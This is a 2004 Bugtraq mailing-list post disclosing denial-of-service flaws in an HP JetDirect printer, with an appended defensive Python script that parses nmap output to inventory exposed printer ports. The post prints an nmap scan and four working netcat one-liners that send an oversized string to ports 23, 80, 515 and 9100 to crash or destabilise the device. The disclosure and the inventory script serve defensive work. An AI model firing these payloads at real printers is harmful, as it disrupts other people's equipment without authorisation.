Message-ID: <Pine.BSO.4.58.0410011253080.17995@voodoo.mediaservice.net>
Date: Fri, 1 Oct 2004 13:04:59 +0200 (CEST)
From: Marco Ivaldi <raptor@...eadbeef.info>
To: bugtraq@...urityfocus.com
Subject: Re: Promiscuous email printing in Canon imageRunner


> Try scanning the IP address with nmap -A 10.0.0.1

Hello Bugtraq,

While we're talking about printers, some time ago I discovered by accident 
some lame Denial of Service vulnerabilities in my HP JetDirect printer 
(tested on J3111A, firmware version G.05.35 -- pretty old). Not sure if 
they can be reproduced on newer models/firmwares.

Here we go:

root@...ron:~# nmap -A x.x.x.x
Interesting ports on printer.mediaservice.pri (x.x.x.x):
(The 1655 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE    VERSION
23/tcp   open  telnet     HP JetDirect printer telnetd
80/tcp   open  http?
515/tcp  open  printer?   
9100/tcp open  jetdirect? 
Device type: printer|print server
Running: HP embedded
OS details: HP printer w/JetDirect card

# telnet -> crash of all network services
root@...ron:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 23

# http -> crash of all network services with funny stack dump on paper! ;)
root@...ron:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 80

# printer -> the printer switches indefinitely between data recv and ready
root@...ron:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 515

# jetdirect -> prints ABCD... and leaves the printer in "unstable" status
root@...ron:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 9100

I've scanned the funny stack dump printed on paper and put it on-line at:

http://www.0xdeadbeef.info/stuff/hp-crash.jpg

You should also take a look at Paul Szabo's excellent web resources on 
PostScript, PJL/PCL, and secure HP printers configuration:

http://www.maths.usyd.edu.au:8000/u/psz/ps.html

Cheers,

-- 
Marco Ivaldi
Antifork Research, Inc.   http://0xdeadbeef.info/
3B05 C9C5 A2DE C3D7 4233  0394 EF85 2008 DBFD B707
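
Added example, not part of the original post: a small inventory check that reads nmap output in the format shown above (and the newer "Nmap scan report for" header) and lists which of the four services from the post are reachable on hosts nmap identifies as printers, as input for access-list or firewall review. The function name, port labels and the second sample host are assumptions made for this illustration.

```python
import re

# The four ports open in the post's scan; the labels are descriptive only.
PRINT_PORTS = {23: "telnet admin", 80: "embedded web server",
               515: "LPD", 9100: "raw JetDirect"}
HOST = re.compile(r"^(?:Interesting ports on|Nmap scan report for) (.+?):?$")
PORT = re.compile(r"^(\d+)/tcp\s+(\S+)\s+(\S+)\s*(.*)$")

# First host: the scan output from the post. Second host: constructed.
SAMPLE = """\
Interesting ports on printer.mediaservice.pri (x.x.x.x):
(The 1655 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE    VERSION
23/tcp   open  telnet     HP JetDirect printer telnetd
80/tcp   open  http?
515/tcp  open  printer?
9100/tcp open  jetdirect?
Device type: printer|print server
Running: HP embedded
OS details: HP printer w/JetDirect card

Nmap scan report for 192.0.2.10
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH
80/tcp open  http    Apache httpd
"""

def exposed_printers(nmap_text):
    """Map each printer-like host to its open print/admin ports."""
    hosts, cur = {}, None
    for line in map(str.strip, nmap_text.splitlines()):
        m = HOST.match(line)
        if m:
            cur = hosts.setdefault(m.group(1), {"ports": [], "printer": False})
            continue
        if cur is None:
            continue
        m = PORT.match(line)
        if m:
            port, state, svc, version = int(m[1]), m[2], m[3], m[4]
            if "jetdirect" in version.lower():
                cur["printer"] = True
            if state == "open" and port in PRINT_PORTS:
                # A trailing "?" means nmap guessed the service from the port.
                cur["ports"].append((port, PRINT_PORTS[port],
                                     svc.rstrip("?"), not svc.endswith("?")))
        elif line.lower().startswith("device type:") and "print" in line.lower():
            cur["printer"] = True
    return {h: d["ports"] for h, d in hosts.items() if d["printer"] and d["ports"]}
```

Each tuple is (port, label, service name as nmap printed it, whether nmap identified the service rather than guessing from the port number); the constructed web server is not reported because nothing marks it as a printer.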


